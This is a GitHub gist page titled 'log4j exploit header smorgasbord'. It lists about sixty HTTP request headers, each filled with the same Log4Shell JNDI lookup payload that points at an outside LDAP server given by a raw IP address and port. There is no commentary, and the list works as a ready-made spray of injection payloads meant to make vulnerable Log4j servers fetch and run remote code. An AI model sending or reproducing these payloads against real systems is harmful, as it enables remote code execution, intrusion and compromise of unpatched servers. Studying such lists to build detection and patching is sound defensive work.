Skip to content

Instantly share code, notes, and snippets.

@n3kt0n
Last active December 14, 2021 03:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save n3kt0n/a9fb68d801079cd1e93871ce5f991c91 to your computer and use it in GitHub Desktop.
Save n3kt0n/a9fb68d801079cd1e93871ce5f991c91 to your computer and use it in GitHub Desktop.
log4j exploit header smorgasbord
Accept-Charset: ${jndi:ldap://193.3.19.159:53/c}
Accept-Datetime: ${jndi:ldap://193.3.19.159:53/c}
Accept-Encoding: ${jndi:ldap://193.3.19.159:53/c}
Accept-Language: ${jndi:ldap://193.3.19.159:53/c}
Cache-Control: ${jndi:ldap://193.3.19.159:53/c}
Cookie: ${jndi:ldap://193.3.19.159:53/c}
Forwarded: ${jndi:ldap://193.3.19.159:53/c}
Forwarded-For: ${jndi:ldap://193.3.19.159:53/c}
Forwarded-For-Ip: ${jndi:ldap://193.3.19.159:53/c}
Forwarded-Proto: ${jndi:ldap://193.3.19.159:53/c}
From: ${jndi:ldap://193.3.19.159:53/c}
Max-Forwards: ${jndi:ldap://193.3.19.159:53/c}
Origin: ${jndi:ldap://193.3.19.159:53/c}
Pragma: ${jndi:ldap://193.3.19.159:53/c}
Referer: ${jndi:ldap://193.3.19.159:53/c}
True-Client-Ip: ${jndi:ldap://193.3.19.159:53/c}
Upgrade: ${jndi:ldap://193.3.19.159:53/c}
Via: ${jndi:ldap://193.3.19.159:53/c}
Warning: ${jndi:ldap://193.3.19.159:53/c}
X-Api-Version: ${jndi:ldap://193.3.19.159:53/c}
X-Att-Deviceid: ${jndi:ldap://193.3.19.159:53/c}
X-Correlation-Id: ${jndi:ldap://193.3.19.159:53/c}
X-Csrf-Token: ${jndi:ldap://193.3.19.159:53/c}
X-Csrftoken: ${jndi:ldap://193.3.19.159:53/c}
X-Do-Not-Track: ${jndi:ldap://193.3.19.159:53/c}
X-Forward-Proto: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-By: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-For: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-For-Original: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-Host: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-Port: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-Proto: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-Protocol: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-Scheme: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-Server: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarded-Ssl: ${jndi:ldap://193.3.19.159:53/c}
X-Forwarder-For: ${jndi:ldap://193.3.19.159:53/c}
X-Frame-Options: ${jndi:ldap://193.3.19.159:53/c}
X-From: ${jndi:ldap://193.3.19.159:53/c}
X-Geoip-Country: ${jndi:ldap://193.3.19.159:53/c}
X-Http-Destinationurl: ${jndi:ldap://193.3.19.159:53/c}
X-Http-Host-Override: ${jndi:ldap://193.3.19.159:53/c}
X-Http-Method: ${jndi:ldap://193.3.19.159:53/c}
X-Http-Method-Override: ${jndi:ldap://193.3.19.159:53/c}
X-Http-Path-Override: ${jndi:ldap://193.3.19.159:53/c}
X-Https: ${jndi:ldap://193.3.19.159:53/c}
X-Htx-Agent: ${jndi:ldap://193.3.19.159:53/c}
X-Hub-Signature: ${jndi:ldap://193.3.19.159:53/c}
X-If-Unmodified-Since: ${jndi:ldap://193.3.19.159:53/c}
X-Imbo-Test-Config: ${jndi:ldap://193.3.19.159:53/c}
X-Insight: ${jndi:ldap://193.3.19.159:53/c}
X-Ip: ${jndi:ldap://193.3.19.159:53/c}
X-Ip-Trail: ${jndi:ldap://193.3.19.159:53/c}
X-Proxyuser-Ip: ${jndi:ldap://193.3.19.159:53/c}
X-Request-Id: ${jndi:ldap://193.3.19.159:53/c}
X-Requested-With: ${jndi:ldap://193.3.19.159:53/c}
X-Uidh: ${jndi:ldap://193.3.19.159:53/c}
X-Wap-Profile: ${jndi:ldap://193.3.19.159:53/c}
X-Xsrf-Token: ${jndi:ldap://193.3.19.159:53/c}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment